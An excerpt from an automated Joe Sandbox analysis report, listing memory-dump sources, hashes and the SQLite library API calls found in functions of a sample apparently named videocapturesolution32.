                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                          • String ID: |
                                                          • API String ID: 1576672187-2343686810
                                                          • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                          • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                          • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                          • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                          APIs
                                                          • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                          • sqlite3_free.SQLITE3 ref: 60953842
                                                          • sqlite3_free.SQLITE3 ref: 6095387C
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                          • String ID: 6$timeout
                                                          • API String ID: 2671017102-3660802998
                                                          • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                          • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                          • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                          • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                          APIs
                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                            • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                          • String ID: $)><$sqlite_master$sqlite_temp_master
                                                          • API String ID: 652164897-1572359634
                                                          • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                          • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                          • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                          • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                          • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                          • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                          • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 2352520524-0
                                                          • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                          • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                          • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                          • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                          APIs
                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                          • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                          • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                          • sqlite3_exec.SQLITE3 ref: 6096A523
                                                          • sqlite3_exec.SQLITE3 ref: 6096A554
                                                          • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                          • String ID: optimize
                                                          • API String ID: 3659050757-3797040228
                                                          • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                          • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                          • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                          • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                          APIs
                                                          • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                          • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                          • sqlite3_reset.SQLITE3 ref: 60965556
                                                          • sqlite3_reset.SQLITE3 ref: 609655B8
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          • sqlite3_malloc.SQLITE3 ref: 60965655
                                                          • sqlite3_free.SQLITE3 ref: 60965714
                                                          • sqlite3_free.SQLITE3 ref: 6096574B
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_free.SQLITE3 ref: 609657AA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 2722129401-0
                                                          • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                          • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                          • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                          • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                            • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                          • sqlite3_free.SQLITE3 ref: 609647C5
                                                            • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                          • sqlite3_free.SQLITE3 ref: 6096476B
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_free.SQLITE3 ref: 6096477B
                                                          • sqlite3_free.SQLITE3 ref: 60964783
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 571598680-0
                                                          • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                          • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                          • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                          • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                          APIs
                                                          • sqlite3_mprintf.SQLITE3 ref: 60929761
                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                          • sqlite3_mprintf.SQLITE3 ref: 609297C8
                                                          • sqlite3_mprintf.SQLITE3 ref: 6092988B
                                                          • sqlite3_free.SQLITE3 ref: 609298A4
                                                          • sqlite3_free.SQLITE3 ref: 609298AC
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mprintf$sqlite3_free$sqlite3_initializesqlite3_vmprintf
                                                          • String ID:
                                                          • API String ID: 251866411-0
                                                          • Opcode ID: a3bf00685530be514bf65e4252527f4a7bfa11b3ac4fddf1f02e32dfe1b6d316
                                                          • Instruction ID: c0caaa5c89e6f65941469514643da9571fc5146b16edc1869e8ccb0497590022
                                                          • Opcode Fuzzy Hash: a3bf00685530be514bf65e4252527f4a7bfa11b3ac4fddf1f02e32dfe1b6d316
                                                          • Instruction Fuzzy Hash: 4C417970E142098FCB00DF68D48069EFBF6FFAA314F15852AE855AB344DB34D842CB81
                                                          APIs
                                                          • sqlite3_value_int.SQLITE3 ref: 6091A7A9
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A7C3
                                                          • sqlite3_value_blob.SQLITE3 ref: 6091A7D0
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A7E3
                                                          • sqlite3_value_int.SQLITE3 ref: 6091A842
                                                          • sqlite3_result_text.SQLITE3 ref: 6091A973
                                                          • sqlite3_result_blob.SQLITE3 ref: 6091AA08
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_int$sqlite3_result_blobsqlite3_result_textsqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 1854132711-0
                                                          • Opcode ID: 784825b838f169ca3662fcccfed6716ebcc1b6a8caffef0423c1b1d1c55abeb3
                                                          • Instruction ID: 5a39f3de11663d91415d6d961256fd3a5a8574b0eada45011bd6777fd74d0884
                                                          • Opcode Fuzzy Hash: 784825b838f169ca3662fcccfed6716ebcc1b6a8caffef0423c1b1d1c55abeb3
                                                          • Instruction Fuzzy Hash: 6CA15C71E0862D8BDB05CFA9C88069DB7B2BF69324F148299E865A7391D734DC86CF50
                                                          APIs
                                                          • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                            • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                          • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                          • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                          • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                          • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                          • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                          • sqlite3_free.SQLITE3 ref: 60963621
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                          • String ID:
                                                          • API String ID: 4276469440-0
                                                          • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                          • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                          • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                          • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                          Strings
                                                          • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                          • ESCAPE expression must be a single character, xrefs: 6091A293
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                          • API String ID: 4080917175-264706735
                                                          • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                          • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                          • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                          • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                          APIs
                                                            • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                          • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                          • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: library routine called out of sequence$out of memory
                                                          • API String ID: 2019783549-3029887290
                                                          • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                          • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                          • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                          • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                          APIs
                                                          • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                          • sqlite3_free.SQLITE3 ref: 609406F7
                                                          • sqlite3_free.SQLITE3 ref: 60940705
                                                          • sqlite3_free.SQLITE3 ref: 60940713
                                                          • sqlite3_free.SQLITE3 ref: 6094071E
                                                          • sqlite3_free.SQLITE3 ref: 60940729
                                                          • sqlite3_free.SQLITE3 ref: 6094073C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                          • String ID:
                                                          • API String ID: 1159759059-0
                                                          • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                          • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                          • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                          • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                          APIs
                                                          • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                            • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                          • sqlite3_log.SQLITE3 ref: 609498F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                          • String ID: List of tree roots: $d$|
                                                          • API String ID: 3709608969-1164703836
                                                          • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                          • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                          • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                          • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                          APIs
                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                          • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                          • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                          • sqlite3_free.SQLITE3 ref: 6096029A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
